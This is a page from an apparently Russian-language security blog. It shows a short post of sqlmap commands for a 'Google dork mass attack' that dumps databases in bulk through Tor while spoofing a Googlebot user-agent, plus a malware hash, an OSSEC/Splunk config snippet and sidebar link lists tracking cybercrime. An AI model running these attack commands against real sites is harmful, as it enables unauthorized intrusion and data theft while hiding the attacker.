[Hack and Security] Cookies

03.10.2015

sqlmap [google dork] mass attack

sqlmap -g "dork" --batch --beep --dbs --random-agent

sqlmap -u "site" --dbs --batch --beep --tor --check-tor --tor-type=SOCKS5

sqlmap --tor --tor-type=SOCKS5 -u "http://www.hackable.org/view_section.php?id=10" --user-agent="Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

на 13:45

Отправить по электронной почте Написать об этом в блоге Опубликовать в Twitter Опубликовать в Facebook Поделиться в Pinterest

hashs: exploit, hack, sql, tor

01.10.2015

OTX

a91ed8e8bdc2d3d7fcc36f26d5c1b919266e3e6ed1a4a0e720ab960a49efb1e9

на 16:24

Отправить по электронной почте Написать об этом в блоге Опубликовать в Twitter Опубликовать в Facebook Поделиться в Pinterest

hashs: analysis, forensic, malware, otx

30.09.2015

[ OSSEC + Splunk ] config/install

On Splunk:

Example install Splunk:

rpm -Uvh splunk-5.0.2-149561-linux-2.6-x86_64.rpm

Install ossec module into splunk

nano /opt/splunk/etc/system/default/inputs.conf

[udp://192.168.10.109:10002] # OSSEC server IP
disabled = false
sourcetype = ossec

OR

на 17:40

Отправить по электронной почте Написать об этом в блоге Опубликовать в Twitter Опубликовать в Facebook Поделиться в Pinterest

hashs: analysis, forensic, log, oosec, security, SOC, splunk

Следующие Предыдущие Главная страница

Подписаться на: Сообщения (Atom)

search инфы по блогу:

Friends :) - vxlab.info

hash

security (61) malware (49) hack (45) forensic (24) analysis (22) install (19) APT (18) exploit (16) linux (16) payload (15) fireeye (14) windows (14) scanner (12) vulnerability (12) metasploit (11) vmware (9) ex (8) wifi (8) botnet (7) shell (7) TWITTER_SEC_MEMORIES (5) brute (5) framework (5) password (5) sandbox (5) sniff (5) xss (5) beef (4) fx (4) mitm (4) nx (4) puppet (4) rat (4) vm (4) UA (3) blogs (3) burpsuite (3) fortinet (3) injection (3) juniper (3) log (3) mail (3) openssl (3) phish (3) proxy (3) python (3) reverse (3) ssh (3) tcpdump (3) tor (3) android (2) arbor (2) cookie (2) ddos (2) docker (2) dos (2) fakeap (2) hask (2) ids (2) my_preza (2) nginx (2) owasp (2) scada (2) server (2) srx (2) web (2) wps (2) yara (2) SOC (1) ansible (1) armitage (1) audit (1) balance (1) bash (1) bcc (1) centos (1) cheat (1) cisco (1) cloud (1) cobaltstrike (1) copy (1) coreos (1) ctf (1) darknet (1) database (1) debian (1) delete (1) docs (1) dpkg (1) elk (1) eset (1) exel (1) forums (1) freenas (1) fuzz (1) google (1) hash (1) honeypot (1) ics (1) ip (1) iptables (1) is-is (1) it (1) javascript (1) joomla (1) kill (1) kvm (1) lab (1) lvm (1) macro (1) manual (1) maps (1) mssql (1) mx (1) nas (1) network (1) noriben (1) ntfs (1) ntlm (1) ntp (1) office (1) oosec (1) openvpn (1) otx (1) pentestit (1) policy (1) post (1) private (1) profile (1) proxmox (1) public (1) ransomware (1) repo (1) router (1) safe (1) san (1) scp (1) seb (1) sites (1) skype (1) social (1) soft (1) splunk (1) sql (1) ssl (1) tarpit (1) tools (1) track (1) traffic (1) usb (1) viper (1) virtualization (1) vmdk (1) vpn (1) wiki (1) xee (1) yota (1)

#RUS_SecBlogsList

Бизнес без опасности
Жизнь 80 на 20
Безопасность для понимающих и не очень
Security Insight
В тему и offtopic
Рецепты безопасности от Емельянникова
Блог Артема Агеева
Блог Сергея Борисова про ИБ
Синдром сапожника
Быть, а не казаться | О безопасности и не только
Записки на манжете
Ригельз Дыбр
ZLONOV.ru | Alexey Komarov's blog
Взрывной блог » Взлом и защита, с перевесом первого. Несерьёзный блог о серьёзных вещах
Защита персональных данных и не только - книга рецептов
Информационная безопасность (Ростовская область)
Информационная безопасность - АУДИТ, ОЦЕНКА
Архивы безопасности
REPLY-TO-ALL Information Security Blog
Солянка
ИБ. Взгляд снизу
www.itzashita.ru Проект "ИТ-защита". ИТ безопасность. Стандартизация, проектирование, методология.
Intercept the planet!
Redirecting
Manannikov-DA | BIS-Expert
0xAA - Random notes on security
Безопасность АСУ ТП
ИБ в СПб
АГАСОФИЯ
Журнал Изменений
Дудко Дмитрий, информационная и экономическая безопасность
Смотря как смотреть
Redirecting
Another Brick in the Firewall
Блог Павла Кулькова в informationsecurity.club
Секьюрный | Securny | блог специалиста по системной интеграции в области Identity Management & Access Governance
egengrinovich
Социальная инженерия

/archive

► 2017 (1)
- ► 02/12 - 02/19 (1)

► 2016 (63)
- ► 07/31 - 08/07 (1)
- ► 06/12 - 06/19 (2)
- ► 05/22 - 05/29 (1)
- ► 05/15 - 05/22 (1)
- ► 05/08 - 05/15 (1)
- ► 05/01 - 05/08 (1)
- ► 04/17 - 04/24 (4)
- ► 04/10 - 04/17 (3)
- ► 04/03 - 04/10 (1)
- ► 03/20 - 03/27 (2)
- ► 03/13 - 03/20 (1)
- ► 03/06 - 03/13 (4)
- ► 02/28 - 03/06 (4)
- ► 02/21 - 02/28 (2)
- ► 02/14 - 02/21 (3)
- ► 02/07 - 02/14 (5)
- ► 01/31 - 02/07 (7)
- ► 01/24 - 01/31 (5)
- ► 01/17 - 01/24 (6)
- ► 01/10 - 01/17 (8)
- ► 01/03 - 01/10 (1)

▼ 2015 (197)
- ► 12/20 - 12/27 (4)
- ► 12/13 - 12/20 (3)
- ► 12/06 - 12/13 (6)
- ► 11/08 - 11/15 (1)
- ▼ 09/27 - 10/04 (3)
- ► 09/20 - 09/27 (2)
- ► 09/13 - 09/20 (4)
- ► 09/06 - 09/13 (1)
- ► 08/30 - 09/06 (1)
- ► 08/23 - 08/30 (4)
- ► 08/02 - 08/09 (1)
- ► 07/26 - 08/02 (2)
- ► 07/19 - 07/26 (3)
- ► 07/12 - 07/19 (5)
- ► 07/05 - 07/12 (6)
- ► 06/28 - 07/05 (2)
- ► 06/21 - 06/28 (6)
- ► 06/14 - 06/21 (5)
- ► 06/07 - 06/14 (4)
- ► 05/31 - 06/07 (3)
- ► 05/24 - 05/31 (4)
- ► 05/17 - 05/24 (12)
- ► 05/10 - 05/17 (18)
- ► 05/03 - 05/10 (6)
- ► 04/26 - 05/03 (23)
- ► 04/19 - 04/26 (66)
- ► 04/12 - 04/19 (1)
- ► 02/08 - 02/15 (1)

#World_SecBlogsList

#Online_SandboxList

ThreatExpert
Anubis
CWSandbox
Comodo
jsunpack
Wepawet

#Malware_SamplesList

Secubox Labs
VX Vault
Malekal
MalwareBlacklist
Feodo Tracker
ZeuS Tracker
SpyEye Tracker
Palevo Tracker
SafeGroup
Clean MX
Malc0de
Malware Domain List
NovCon Minotaur

#Cybercrime_Tracking

Ransomwares
Money laundering (MoneyPak)
Trojan:Win32/Tobfy.M Affiliate
Trojan:Win32/Reveton
Multi Locker 3.0
Epubb winlock affiliate
Silence Winlocker 5.0
Gimemo guys still use free service for stats
weelsof use SSL C&C
Ulocker
Gangstaservice Winlock Affiliate
Winlock affiliate
EURO Winlocker
Win32/Weelsof: Smoke Loader, Zeus, Ransomware... juicy business
Backdoor.Bot.LameNova
PaySitesClub affiliate recycle malware domains ?
Silence Winlocker
GEMA / FakePoliceAlert and money laundering)
CatTrade (Ransomware Affiliate)
FakePoliceAlert updated
Хендехох Affiliate
FakeAV/FakePoliceAlert: Source code for sale
WinAD gang
Winlock Builder [Private] v1.30

Private AV Checkers
Serenity Scanner
Element Scanner
multi-scan.com
scan4you.net
chk4me.com
Virtest and Palevo

FakeAV
FakeAV abandoned affiliate
Black processing service for malware only
Talking to a FakeAV black processing service
FakeAV Affiliate who distribute Zaxar Family
Bombacash affiliate
star-stat.com (reseller bestavsoft2)
Money Racing AV
True Big Cash (FakeAV Affiliate)
FakeAV GUI/FakeAV Site requirements specification
PrivatCoin Affiliate
FakeAV/FakePoliceAlert: Source code for sale
yambaprivate.com (Fake.HDD)
AV-AFF.BIZ (Total Protect FakeAV)
Golden Ducat
BestAV and BlackSoftware *Reloaded*
Severa and Black Software
Gagarincash AV
BestAV

Hoax SMS
Stimul Premium (Java.SMSSend)
WapSyst (Java.SMSSend)
Wizard Mobile (JAVA/SMSSend - Android/FakeInst)
ZipWap (JAVA/SMSSend - Android/FakeInst)
CenterCash
Zip Archive

Malware 'general'
Android/FakeToken.A
Troj/WowSpy-A
Jolly Roger Stealer
Win32/BruteForce.WP
Win32/Atrax.A
Reversible Rovnix passwords
Power Loader 2.0 (Alueron)
FeodalCash Affiliate (Trojan:Win32/Tarcloin)
Pony 1.9 (Win32/Fareit)
Panel Control RëFF
Picebot pharming botnet
Citadel cracked builder ?
Win32/Pikboclick.A (Trojan.Clicker)
Trojan.Win32/Spy.Ranbyus
Andromeda bot
IceIX/Zeus Red/Zeus
Moneycloud PPI Affiliate (Simda.A)
It's the end of Citadel ?
Barracuda Loader
Backdoor.Nucleroot/Win32.Umbald.A (Umbra Loader)
W32/PixSteal.A
Knucker.C/LoveLetter
BackDoor-ARD/BackDoor.Feardoor
Sh*t happens
Citadel 1.3.5.1 Rain Edition
ZeuS / XAT Loader
Citadel
Tick Panel (hermes/tatanga)
MP-FormGrabber
NetWire first Multi-platform RAT
CheapMiner
W32/AccPhish
Aldibot
Gold Installs Affiliate
Gigabid affiliate (Win32/Cycbot)
Pay For Install (Win32.StartPage)
Malwox (Win32/Cidox Affiliate) Mayachok.1
yambaclick.com (Alureon)
Ready to Ride v3 (cycbot)

Fake shops
TowPow BulletProof Affiliate
365pills (pharma affiliate)
rx-partners.biz (huge pharma affiliate)
badbase.ru (Fake pharma)
Doktor Dick affiliate (Fake pharma)
Mailien 3.0 (Fake pharma)
Vertu Cash (VERTU Replica)
Luxury Cash (Replica Watches)
Books Sellers (Fake Ebooks)
Software Sellers (Fake OEM)
EvaPharmacy (Fake pharma)
PharmIncome and CigIncome (Fake pharma/Cigs)

Exploit kit / Loaders
Serenity Exploit Kit / AlphaPack v8
Blackhole v2.0.0
Eleonore Exploits pack v1.2
Fragus exploit kit
Phoenix Exploit's Kit 3.1 full
Blackhole v1.2.3
Crimepack 3.1.3
SKY-Loader v.1.2
Blackhole v1.2.2
Blackhole v1.2.1
Sakura Exploit Pack 1.0
Blackhole v1.2.0
Blackhole v1.1.0

Misc
Candytrip
Contract Killings
Log parser
Unknown Webinject
SparkyJava
AnonJDB
How to infiltrate affiliate programs
Win32/Rovnix
CryptoService
SUTRA TDS v3.4
IframeShop.net
Another cc-grabbers web based
cc-grabbers admin panel bender edition

Phishing / Spam
Phish a phisher
Phishing made easy, way too easy...
Phish-BankFraud EDF again and again
Spamming on compromised RDP
Phish-BankFraud: RDP Spam
Phish-BankFraud (EDF, CAF, and now Carrefour)
Phish-BankFraud (EDF+CAF)
Phish-BankFraud/PHP.Mailer/PHP.Shell
spamb0x.com, World Wide Spam
Phishing Hunting
Freshdb (spammers shop)

Credit card fraud related
ZeusVM and Steganography
How the protection of Citadel got cracked
Win32/Spy.POSCardStealer.O and unknown POS Sniffer
Citadel targeting Canada
Inside a malware campaign: Alina + Dexter + Citadel
Having a look on the KINS Toolkit
Point-of-Sale Malware: Infostealer.Dexter
Micro camera for skimmer
Carberp archive
Who's behind Alina ?
Citadel lawsuit and explanation of John Doe 25
Carding Manager
Dump Memory Grabber / BlackPOS (Win32/Pocardler.A)
ProjectHook RAM Scrapper
Off-sho.re and Darkode
Liberty Reserve Curl Scam script
Cardingmaster.com carding shop
getdumps.com Fake Carding shop and LR Curl scam script
Fake carding shops
Skimmers: NCR/Diebold/Wincor
Darkode: I Accidentally…
Darkode leak
Embosser and BSR
VMADUMPS (Carding shop)
Carding on compromised RDP
You're valentine is a carder
Alina 3.4 (POS Malware)
Counterfeit euro notes
adminshop2013.com (Carder shop)
Petroleum POS malware ?
vSkimmer, Another POS malware
Point-of-Sale and memory scrappers
vksh0p.com card shop
DUMPSLOGS.COM Card shop
Nano Wincor Skimmer
Troj/Skimer-A
Fake French administrative documents
How I Carded Myself
NCR/Wincor/Diebold/Nano/round/Green/Camera/Panel Skimmers and 3D models
Round NCR / Green NCR / Nano Wincor Skimmer
Skimmer Services
Cash-trapping
CardingStuff
Visa/Mastercard Silver & Gold, Stickers/Hot Stamping
NCR SelfServ Bezel / Wincor/Diebold skims
NCR/Diebold/Wincor Skimmers
3D models of bezels
Wincor/NCR Skimmers
Green Anti/round/Flat/Nano/universal Skimmers
Wincor/NCR/Diebold Skimmers
Plastic service UV passable
GSM skim for NCR
Fake 50 Euros
seriousbiz.ru card shop disguised as Squirrel Mail
ATM skimmers (NCR/DIEBOLD)
Plastic service and fake documents
POS Carding
Interview with a carder
luvservice.be (Paypal shop)
bastard.su FuLLz
ProfitBins.ru
ATM skimmer (Diebold)
lulzsec.su iProfit PayPal Shop
pawn-shop.cc
we-deal.net black services

xylibox

/dev/nulls. Автор изображений для темы: Ollustrator. Технологии Blogger.